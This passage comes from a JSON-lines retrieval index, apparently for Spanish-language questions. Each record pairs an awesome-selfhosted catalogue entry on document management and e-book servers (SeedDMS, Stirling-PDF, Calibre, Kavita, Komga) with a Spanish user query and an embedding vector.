-0.00592, 0.00522, 0.02364, -0.06626, 0.04043, -0.01054, -0.00689, 0.00454, 0.0062, 0.00168, -0.0481, -0.00783, -0.01246, 0.04616, 0.00225, -0.00812, -0.03828, 0.02468, -0.01452, 0.05815, -0.06567, 0.04524, 0.01609, 0.02266, 0.04973, 0.0071, -0.02422, 0.01141, 0.02445, -0.01664, -0.01775, 0.04871, 0.00759, 0.05321, -0.00131, -0.01854, -0.06537, -0.03359, 0.04784, -0.02111, -0.01398, -0.07115, -0.01856, -0.03968, 0.04334, 0.02902, -0.06114, -0.02057, 0.01874, 0.06341, -0.02931, 0.00173, -0.04912]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "que programa puedo instalar localmente para gestionar documentos con bΓΊsqueda avanzada y permisos de acceso?", "v": [0.16596, 0.19163, -0.14483, -0.29064, 0.12104, -0.04093, 0.05976, -0.10733, -0.21455, -0.07932, -0.02721, -0.04743, -0.02039, -0.09015, 0.06562, -0.02052, 0.12095, -0.15011, -0.03091, 0.06696, 0.02415, 0.04575, -0.03058, 0.00147, -0.00765, 0.00037, 0.05736, -0.11164, -0.06288, -0.12147, 0.01054, 0.05544, -0.04291, -0.00711, -0.00101, -0.02561, 0.00766, 0.02478, -0.01717, -0.04326, 0.02677, 0.04842, -0.09309, 0.06832, 0.01328, -0.07469, 0.0489, 0.00986, -0.02878, -0.10243, -0.08305, -0.03339, -0.04835, -0.04888, 0.01983, -0.06967, 0.14502, -0.14743, 0.02665, 0.01389, -0.1249, 0.01014, -0.03072, 0.0912, 0.05262, 0.04327, 0.21207, 0.05306, -0.07907, 0.09953, -0.12619, 0.03362, 0.04113, -0.01836, -0.0195, -0.01628, -0.06615, 0.0083, 0.06273, 0.01734, 0.03852, -0.00535, -0.07175, -0.00619, -0.1398, -0.12338, 0.01695, -0.06445, 0.02988, -0.00627, 0.01535, -0.01817, 0.006, -0.00071, 0.05611, -0.07999, 0.05452, 0.02738, -0.04038, 0.04269, -0.03467, 0.00969, -0.00919, 0.1558, -0.04628, 0.02652, 0.0732, -0.07072, -0.03119, 0.03366, -0.08017, 0.05177, -0.00694, 0.04856, -0.03657, 0.03593, 0.0216, -0.0511, -0.01906, -0.03047, -0.07524, -0.04635, -0.02119, 0.0807, 0.0887, -0.09681, -0.02801, 0.12818, -0.07751, 0.04001, 0.04508, -0.0278, 0.02934, 0.02366, -0.04556, -0.00458, -0.02721, -0.02531, -0.04287, -0.01977, -0.02701, 0.01872, 0.03611, 0.0139, 0.04314, -0.00637, -0.04439, -0.00912, 0.02555, -0.04602, 0.04255, -0.05642, 0.00996, 0.12176, -0.05178, 0.03207, 0.02866, -0.00961, -0.05363, 0.02443, 0.02188, 0.05331, -0.08402, 0.03695, 0.03399, 0.02882, -0.03886, 0.00593, 0.04347, 0.04516, -0.05811, 0.00054, 0.01845, -0.09605, 0.0503, -0.04466, 0.05463, -0.12095, 0.05045, 0.00436, -0.08521, 0.05574, 0.01681, 0.02316, -0.0447, -0.03488, -0.01091, -0.00445, 0.01789, -0.01037, 0.0337, 0.04962, -0.03759, 0.0016, 0.0008, -0.03517, -0.05227, -0.00667, -0.0514, -0.02624, -0.05047, 0.02952, -0.06324, -0.03571, 0.04557, 0.02464, -0.02922, 0.04768, 0.03251, 0.05183, -0.0369, -0.03647, 0.0354, -0.01848, -0.0965, -0.05138, -0.00935, -0.00662, 0.01229, 0.00584, 0.05016, 0.00162, 0.07617, 0.02287, 0.04374, -0.09913, 0.06617, 0.0157, 0.04712, 0.03151, -0.02328, 0.03056, -0.03114, -0.06126, 0.04752, 0.02362, 0.01218, -0.03168, -0.03304, -0.02158, 0.02819, 0.08547, 0.00808, -0.00859, -0.08838, -0.012, -0.06529, 0.01471, 0.04487, -0.02506, -0.01054, 0.05685, 0.03733, -0.05267, 0.04747, -0.03847]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "con quΓ© herramienta puedo firmar archivos PDF y editar sus metadatos sin salir de casa?", "v": [0.06858, 0.05262, -0.086, -0.07275, 0.06743, -0.09055, -0.03509, -0.0693, -0.07443, -0.01698, -0.17149, -0.1068, 0.05269, -0.18559, 0.03743, 0.03793, 0.17094, 0.00104, 0.01964, -0.02409, 0.05888, 0.02972, -0.05618, -0.07768, -0.07065, -0.10355, 0.06197, 0.05136, -0.16642, 0.06116, 0.02858, 0.08975, 0.11753, -0.03968, -0.08538, 0.07525, -0.02771, 0.10003, -0.03371, 0.0651, 0.0214, 0.19884, -0.00298, 0.06713, -0.07708, -0.08388, 0.02551, 0.02651, 0.00778, 0.0518, -0.04873, -0.1596, -0.07393, 0.05497, -0.09081, -0.06758, 0.21386, -0.13884, 0.03599, -0.04239, -0.0669, 0.08971, -0.02335, 0.03937, -0.06624, -0.06578, -0.06534, 0.0012, 0.02076, 0.06106, -0.03207, 0.04475, -0.04115, -0.03758, -0.08812, -0.02021, -0.03919, -0.11231, -0.00491, 0.03483, 0.07283, -0.05284, -0.10801, 0.02412, 0.00944, -0.15271, -0.03566, -0.0653, 0.0198, -0.09945, 0.05435, -0.04088, 0.08218, -0.00012, -0.01475, -0.04132, 0.15104, -0.05478, -0.01047, -0.06786, 0.09196, 0.02913, -0.02529, 0.0397, -0.01678, -0.07499, -0.10107, 0.04737, -0.06972, 0.05307, 0.05336, 0.0735, 0.01319, 0.00115, -0.07534, 0.01513, -0.03873, -0.13787, -0.01263, -0.10829, 0.04099, -0.03188, -0.04391, -0.07355, -0.03387, -0.049, 0.05647, 0.07652, -0.10103, 0.01139, 0.06976, -0.01187, -0.13682, 0.01088, 0.0205, 0.01837, -0.02644, -0.05256, -0.06432, -0.09043, 0.06085, -0.03103, -0.00375, -0.00174, 0.04273, 0.02697, -0.05033, -0.02034, -0.0909, -0.06726, -0.03331, -0.02138, -0.00741, 0.01947, -0.01049, -0.0027, 0.04513, -0.01299, -0.05038, 0.04097, -0.05941, -0.00505, -0.03273, -0.06272, -0.07619, 0.00276, 0.06207, 0.01797, -0.02595, -0.00609, 0.01799, -0.00089, -0.05955, -0.03086, 0.04195, -0.10438, -0.01623, 0.03144, -0.01309, -0.05022, -0.06079, 0.03062, 0.00617, -0.01524, -0.01107, 0.01737, 0.0539, -0.02618, -0.00345, -0.00136, -0.06547, 0.05506, -0.01396, -0.02326, -0.04143, -0.03662, -0.07125, -0.00639, 0.07456, 0.00105, -0.03946, -0.04874, 0.03352, 0.0205, 0.11312, 0.0743, -0.02601, 0.0175, -0.01328, 0.02163, 0.01864, -0.04495, 0.04038, -0.02006, 0.00115, 0.02568, -0.03762, 0.05756, 0.03739, 0.07808, 0.13326, 0.02335, 0.09301, -0.06739, 0.04707, 0.03514, 0.04319, -0.01006, -0.01695, 0.02436, 0.03712, -0.03666, -0.01439, 0.00876, 0.03876, -0.00764, 0.0526, -0.01998, -0.04731, -0.02989, -0.002, 0.06559, 0.00604, -0.0215, -0.04806, -0.0318, -0.02432, 0.01157, 0.04034, -0.0478, -0.01548, 0.05997, 0.07702, -0.00426, 0.05222, -0.05256]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "cual es una alternativa libre para organizar automΓ‘ticamente los documentos de mi pequeΓ±a empresa?", "v": [0.03604, 0.20146, -0.05952, -0.08657, 0.01844, -0.07349, -0.00325, -0.06154, -0.26555, -0.10056, -0.13261, -0.17093, 0.04941, -0.08832, 0.09079, -0.04942, 0.1475, -0.19269, 0.0518, 0.00269, -0.05609, 0.02187, -0.03132, 0.04669, -0.0349, -0.10757, 0.09831, -0.02198, -0.17322, 0.00871, 0.05501, 0.07661, 0.04718, -0.05951, -0.0289, 0.03566, 0.07287, 0.03822, -0.00554, -0.08245, 0.0048, -0.00648, -0.11954, 0.14199, -0.00618, 0.0281, -0.00474, 0.09533, -0.05247, 0.04157, -0.06738, -0.00681, -0.03089, 0.02531, -0.00418, -0.01214, 0.0372, -0.12314, -0.00881, -0.02123, -0.05778, 0.02408, -0.03586, 0.05594, 0.01927, 0.10129, -0.00084, -0.02966, -0.00948, 0.04475, -0.01485, -0.06357, -0.02005, -0.08233, -0.0255, 0.0649, -0.02971, 0.05684, -0.01924, 0.1583, 0.07001, -0.00871, -0.04799, 0.0787, -0.01792, -0.12471, -0.01221, 0.00926, 0.07014, 0.02155, -0.00754, -0.01991, 0.00098, 0.07316, -0.01129, -0.09732, 0.09885, 0.07129, -0.007, 0.07034, -0.01434, -0.0165, -0.05779, -0.00164, -0.06211, 0.02011, -0.06089, 0.01159, -0.08382, -0.0026, -0.03931, 0.04421, 0.01814, 0.05077, -0.05389, -0.07576, 0.04541, -0.03079, -0.03498, -0.02756, 0.00392, -0.04937, 0.06739, -0.00379, -0.02509, -0.0757, 0.06306, 0.14312, 0.0108, -0.01864, 0.12043, -0.04027, -0.15297, -0.06117, -0.05075, -0.00819, -0.06153, -0.0413, 0.05023, -0.05736, -0.03381, -0.01456, -0.03637, -0.03524, 0.12681, -0.02141, -0.01505, -0.0297, -0.00394, 0.06336, -0.06943, -0.02623, 0.00895, 0.0943, -0.03867, 0.07363, -0.02642, -0.0443, -0.02112, 0.08677, 0.05475, -0.04713, -0.0432, 0.07422, 0.0035, -0.06222, -0.01571, -0.04147, -0.04018, -0.00189, 0.00604, 0.02133, 0.04894, -0.09981, 0.01574, -0.05672, -0.01094, -0.06933, 0.07721, -0.02933, 0.0302, 0.08315, -0.05881, 0.053, -0.01576, -0.02677, 0.07272, -0.02816, 0.08533, -0.00586, -0.00543, 0.02685, -0.03109, -0.09255, -0.04009, -0.04638, -0.04742, -0.13127, 0.00305, -0.00194, -0.05164, -0.02924, -0.07849, 0.01428, 0.00534, 0.0346, -0.03017, 0.06017, -0.00398, 0.08837, 0.03132, 0.00804, 0.06608, -0.00136, -0.13379, 0.00491, 0.0147, -0.0641, 0.06614, 0.02496, 0.05758, -0.01678, 0.09915, -0.04209, -0.03903, -0.0275, 0.06615, 0.05313, 0.00447, 0.00399, -0.03422, 0.08722, -0.01362, 0.0106, 0.03528, -0.00842, 0.0307, -0.05351, 0.00734, -0.02015, 0.05983, 0.07128, -0.04406, -0.02846, -0.08388, -0.01269, -0.04395, 0.02229, -0.03849, -0.02918, -0.02079, 0.02376, 0.06235, -0.01885, 0.01607, -0.02153]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "que programa puedo usar para gestionar y organizar mi biblioteca personal de libros electrΓ³nicos?", "v": [0.02878, 0.09053, -0.09826, -0.20408, 0.03259, -0.08849, -0.02254, 0.02622, -0.16117, -0.2204, -0.14482, -0.04571, 0.02857, -0.00978, 0.00847, -0.08186, 0.15246, -0.11815, 0.03563, -0.00749, -0.01389, 0.11051, -0.0735, 0.06554, 0.00573, -0.0129, 0.03004, 0.0106, -0.01989, 0.16219, 0.00172, 0.06148, 0.07364, -0.14992, 0.03024, 0.03006, 0.06981, 0.04971, -0.03076, -0.05886, -0.0093, 0.06937, 0.00515, 0.04587, 0.07248, -0.02536, 0.10891, -0.00957, -0.02, 0.06601, -0.09429, -0.00958, -0.0692, 0.00841, 0.06746, -0.12894, -0.00902, -0.13743, 0.0346, -0.0596, -0.03542, 0.04994, 0.04847, 0.03001, 0.13056, 0.05055, 0.03723, 0.00691, -0.18095, 0.08642, -0.03634, 0.01829, -0.02124, -0.00421, -0.00052, 0.06431, 0.03461, 0.02934, 0.07145, 0.02219, -0.04181, -0.05897, 0.04476, 0.0461, -0.08822, -0.0442, 0.03117, -0.02831, 0.05851, 0.01176, -0.04493, 0.01062, -0.07889, -0.09964, 0.07083, -0.04656, 0.06939, 0.04745, 0.03228, 0.10228, 0.05373, -0.0109, -0.01795, 0.11404, -0.13901, -0.02658, -0.00065, -0.01123, 0.08758, -0.09339, -0.05487, -0.01413, 0.01469, -0.02953, -0.07216, -0.01498, 0.09188, -0.05734, 0.08041, 0.05689, -0.14129, -0.04602, -0.02335, -0.06411, 0.16381, 0.04955, 0.1105, 0.08513, -0.00078, 0.03277, 0.02115, -0.04636, -0.02281, -0.01236, -0.07222, 0.00098, -0.11816, -0.10807, -0.00473, -0.07425, -0.01007, 0.03265, -0.05337, -0.0426, 0.01603, -0.11032, 0.04215, 0.00282, -0.02014, 0.00333, 0.01508, -0.04869, 0.01943, 0.08349, -0.01399, 0.07655, 0.05262, -0.07646, -0.07021, -0.00631, -0.07107, 0.03136, 0.02923, 0.00163, -0.03851, -0.04768, 0.03649, 0.02278, 0.05332, 0.03625, -0.08649, 0.03657, 0.00517, -0.04789, 0.00939, -0.06021, -0.01274, -0.00771, 0.07805, 0.05053, -0.06962, 0.06043, 0.02942, -0.03541, -0.09058, -0.03897, -0.00465, -0.02421, -0.03846, -0.04145, -0.01206, 0.04894, 0.01677, -0.00239, 0.02526, -0.01739, -0.09134, 0.05951, 0.02799, -0.06386, -0.00484, 0.00782, -0.02997, 0.06122, 0.07545, 0.01148, -0.05305, 0.07576, 0.00634, 0.02906, -0.00716, -0.02321, 0.04948, -0.00872, -0.10233, -0.0574, -0.0678, 0.02516, 0.03367, -0.02391, 0.05126, 0.00369, 0.05005, 0.02802, 0.05929, -0.0619, 0.0174, -0.00367, 0.04481, 0.04437, -0.03749, -0.05159, 0.01877, 0.02731, 0.00231, -0.01285, 0.05755, -0.02289, -0.04155, -0.0511, -0.02379, 0.11908, -0.02961, -0.04571, -0.03507, -0.01736, -0.11677, 0.04466, -0.05667, -0.02403, -0.01106, 0.00275, 0.03973, -0.02765, 0.01127, 0.00198]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "con quΓ© herramienta puedo convertir mis cΓ³mics en formato Kindle o EPUB automΓ‘ticamente?", "v": [-0.0086, 0.06897, -0.06354, -0.05768, 0.02755, -0.12563, -0.09388, 0.09405, -0.13771, -0.2386, -0.11077, -0.02887, -0.08464, -0.04621, 0.00072, 0.00569, 0.05948, -0.15007, 0.03367, 0.04509, 0.10954, -0.07108, -0.09546, -0.09883, 0.10925, 0.04722, -0.07351, 0.14662, -0.11948, 0.03222, 0.0397, 0.11161, 0.0328, -0.09404, -0.13156, 0.01556, 0.06968, 0.15684, -0.02627, 0.049, 0.0382, 0.0365, -0.04235, 0.02363, -0.0578, -0.04558, 0.00409, 0.06094, -0.00726, 0.07117, -0.02628, -0.03962, -0.19756, -0.00608, -0.02119, -0.17777, 0.21305, -0.11915, -0.00639, 0.07625, -0.02784, -0.00349, 0.01643, -0.08161, 0.02195, 0.08082, -0.05659, -0.01621, -0.10228, 0.0857, -0.06923, 0.02634, 0.0181, -0.05088, 0.05358, -0.00028, -0.12174, -0.06876, 0.09551, -0.05679, 0.09315, -0.04733, -0.00919, 0.02844, 0.05945, -0.05532, -0.05672, -0.08403, 0.03647, -0.03315, -0.06418, 0.00377, 0.05412, 0.06112, 0.00252, -0.09992, -0.00448, -0.05965, 0.00515, 0.04668, 0.03693, 0.0112, -0.13897, 0.08331, -0.11443, -0.03895, -0.05655, -0.04428, -0.03044, 0.07732, 0.00837, 0.08858, 0.01969, 0.00353, -0.09566, -0.04051, 0.0221, -0.04172, 0.07908, -0.0731, -0.03697, 0.00535, -0.01035, 0.0464, 0.09781, -0.01512, 0.03849, 0.04933, -0.07185, -0.0678, -0.00649, -0.05232, -0.07059, -0.00053, 0.00352, 0.0117, -0.00938, 0.01313, -0.06092, -0.0108, 0.02328, 0.03338, 0.01035, -0.08259, 0.04998, -0.14565, 0.02722, -0.09858, -0.03408, -0.00643, -0.00837, -0.04576, 0.07523, 0.04451, 0.0015, 0.03945, -0.02065, -0.06088, -0.03858, 0.04258, 0.05681, -0.02047, 0.05305, -0.03054, -0.09111, -0.03054, 0.03562, -0.0089, 0.02971, 0.03002, -0.04973, 0.00418, 0.04129, -0.02944, 0.07467, -0.06338, -0.07785, 0.05428, 0.06576, -0.03916, -0.04597, -0.00862, 0.03511, -0.0313, -0.09429, -0.06487, 0.05622, -0.02537, 0.04413, -0.0521, -0.04379, 0.01527, -0.0211, -0.05739, 0.02501, -0.02514, -0.09425, -0.01273, -0.02866, -0.04031, -0.04874, 0.02001, -0.00179, 0.02083, 0.04651, 0.03012, -0.00888, 0.05756, -0.04623, 0.00117, -0.04573, 0.00736, 0.03153, 0.00139, 0.02292, -0.05212, -0.03103, -0.0181, -0.00477, 0.01957, 0.0462, -0.00808, 0.07706, -0.0701, -0.05819, 0.03133, 0.05897, 0.01889, 0.01821, 0.04834, -0.04014, 0.06442, -0.00079, 0.00564, 0.02382, 0.01495, 0.03529, 0.01224, -0.07618, -0.01723, 0.0075, 0.031, 0.02185, -0.0159, -0.02373, -0.05007, -0.04472, 0.04006, -0.01613, -0.06378, -0.01426, 0.05141, 0.06281, -0.03143, 0.01118, -0.05418]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "cual es una alternativa libre a Calibre para leer y administrar mis e-books desde la web?", "v": [-0.05886, 0.02474, 0.10245, 0.03293, -0.09647, -0.07414, 0.00114, 0.00833, -0.22731, -0.10621, -0.14423, -0.27362, -0.02763, 0.00221, 0.12202, -1e-05, 0.0171, -0.03988, 0.14705, -0.01747, 0.0459, 0.04279, -0.10971, -0.01137, -0.11128, -0.08494, 0.0081, -0.08391, -0.07165, 0.07999, -0.08423, 0.1084, 0.04189, 0.00369, 0.06629, 0.06339, 0.06194, 0.07229, -0.02915, 0.02399, -0.04636, -0.07028, 0.0145, 0.13861, -0.03963, -0.06586, 0.00752, 0.03218, 0.05097, 0.08745, -0.08511, 0.02778, -0.07894, -0.00755, 0.07313, 0.07076, 0.11021, -0.08743, -0.02238, -0.03377, -0.10845, -0.01312, -0.00861, -0.06719, 0.07216, 0.0108, -0.04014, -0.0234, -0.14404, 0.15451, 0.05093, 0.00941, -0.02362, -0.06875, -0.04264, 0.03278, -0.08258, 0.04219, 0.05505, 0.03653, 0.10693, -0.11599, -0.05092, 0.11459, -0.06749, -0.08735, 0.03631, -0.16041, 0.03675, 0.1119, 0.01045, 0.0195, -0.06884, 0.05234, -0.03041, -0.08165, 0.02323, 0.04685, -0.01982, 0.10437, 0.0811, 0.01439, -0.11869, -0.00262, -0.04066, 0.00953, -1e-05, 0.04544, -0.07202, 0.01711, -0.02581, -0.01056, -0.03553, -0.02464, 0.05795, -0.00022, 0.01384, 0.00927, 0.04957, -0.08324, -0.09831, -0.05302, -0.08824, -0.06813, 0.0774, 0.06132, 0.06956, -0.00815, 0.02354, 0.01027, 0.04898, -0.11342, -0.05146, -0.05085, -0.03321, -0.04473, -0.08745, -0.06291, -0.02844, -0.02137, 0.01277, -0.01053, -0.00819, 0.00155, 0.00065, -0.07441, -0.00773, -0.00409, -0.00926, -0.101, -0.1445, 0.01833, 0.04663, 0.13829, -0.03446, -0.00963, -0.03101, -0.03252, -0.06741, 0.08463, 0.03504, 0.02523, 0.06248, -0.01811, -0.05586, -0.02384, -0.0725, -0.00974, 0.0164, 0.03848, -0.03881, 0.11179, 0.03693, -0.03881, 0.08918, -0.06272, -0.01538, -0.09246, 0.06645, 0.00676, -0.03075, -0.0051, -0.03357, 0.04336, -0.06117, -0.04184, -0.0096, 0.00784, -0.02543, 0.01529, 0.01142, 0.0061, -0.038, -0.08333, 0.02649, 0.04298, -0.04399, -0.00464, 0.02525, -0.02478, -0.04581, 0.01308, -0.03445, -0.00396, -0.01681, -0.02914, -0.00639, 0.09297, -0.00607, 0.09346, 0.01159, 0.01702, 0.05815, 0.00328, -0.04163, -0.0586, -0.03472, -0.00608, -0.01325, 0.02204, 0.05832, 0.00751, 0.03291, -0.01992, 0.03596, 0.00337, -0.013, 0.0719, 0.01039, 0.02708, -0.02876, -0.04068, 0.01989, 0.02868, 0.00211, 0.01367, 0.053, 0.00303, -0.03155, -0.04238, 0.01059, 0.04817, -0.02904, -0.01511, -0.01301, -0.0538, -0.11662, 0.03025, -0.07191, -0.05117, -0.04569, 0.03804, 0.03149, -0.02204, 0.0372, -0.04228]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "que programa puedo usar para montar una biblioteca de cΓ³mics y novelas grΓ‘ficas en casa", "v": [0.13006, 0.00876, -0.05285, -0.08861, -0.09446, -0.09382, 0.00443, 0.0361, -0.08473, -0.15711, 0.01377, -0.10392, -0.07997, -0.00953, -0.03691, 0.00697, 0.05822, -0.11522, 0.08512, 0.05388, 0.05978, -0.00062, -0.07789, 0.00583, 0.01785, -0.0707, 0.08853, -0.02272, -0.00871, 0.11664, -0.05229, -0.0096, 0.11502, -0.13119, -0.09303, -0.03809, 0.04155, -0.08976, 0.0378, -0.01719, 0.07309, 0.00933, -0.02506, 0.01863, -0.05816, -0.01422, 0.00155, -0.09531, -0.0722, -0.06211, 0.02899, -0.03866, -0.05309, 0.04817, 0.01782, -0.14673, 0.04163, -0.06693, -0.05133, -0.00874, -0.00689, 0.09033, 0.04536, -0.06106, 0.07619, -0.01829, -0.06774, 0.03152, -0.08838, 0.05478, -0.0469, 0.0601, -0.00863, 0.02516, -0.01602, 0.0309, -0.10255, -0.15454, 0.13275, -0.05455, 0.0064, -0.03055, -0.05613, 0.10462, -0.06342, -0.06541, -0.01941, -0.12304, 0.01572, -0.0083, -0.09515, -0.01388, -0.11009, 0.01875, 0.09585, -0.10116, 0.10907, 0.01424, 0.10305, 0.08508, -0.00562, 0.00333, -0.05427, 0.15294, -0.05067, -0.07554, -0.02084, -0.00638, 0.03916, -0.06491, 0.01188, 0.04383, 0.0321, -0.00037, -0.14153, 0.01434, 0.02726, 0.00293, 0.08997, -0.06968, -0.18824, 0.04115, -0.03894, 0.07408, 0.0458, -0.02227, 0.16733, 0.03079, -0.0757, -0.01921, -0.08328, -0.03526, -0.06466, -0.08883, -0.06204, 0.02729, -0.08452, -0.06025, -0.03154, -0.03094, 0.09952, 0.00322, -0.00141, -0.01809, -0.00321, -0.03047, -0.04666, -0.04939, -0.03656, -0.02378, 0.01451, 0.06639, 0.04233, 0.03736, 0.07097, 0.07858, 0.09191, -0.06085, 0.0404, -0.00729, 0.02062, 0.03487, 0.00338, -0.07201, -0.08563, 0.04516, -0.00409, 0.01465, 0.05587, 0.07799, -0.10922, 0.08937, -0.02804, -0.01739, 0.09593, -0.05304, -0.06746, 0.03178, -0.03821, 0.0818, -0.08431, -0.04714, 0.03804, -0.05406, -0.09855, -0.05819, 0.00689, -0.02705, 0.01408, -0.07764, -0.06476, -0.01315, 0.01033, 0.07556, -0.00788, -0.03115, -0.07896, 0.07329, 0.0872, -0.10409, -0.0285, 0.06174, 0.03729, 0.06575, 0.1115, 0.0058, -0.01692, 0.09145, -0.02387, 0.04756, -0.01481, -0.0164, -0.00278, 0.00985, -0.02672, -0.12013, -0.09544, -0.0108, 0.05006, 0.00621, 0.02849, -0.011, 0.0324, 0.0375, 0.01208, -0.0334, 0.02504, -0.03711, 0.04252, 0.05976, -0.05049, -0.00437, 0.035, 0.05052, -0.00731, -0.00964, 0.03296, 0.01797, 0.02104, -0.02573, -0.00148, 0.0809, -0.01196, 0.02107, -0.00167, -0.01448, -0.0929, 0.03932, -0.00824, -0.02581, -0.03268, 0.04267, 0.04118, -0.0396, 0.06987, -0.02309]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web 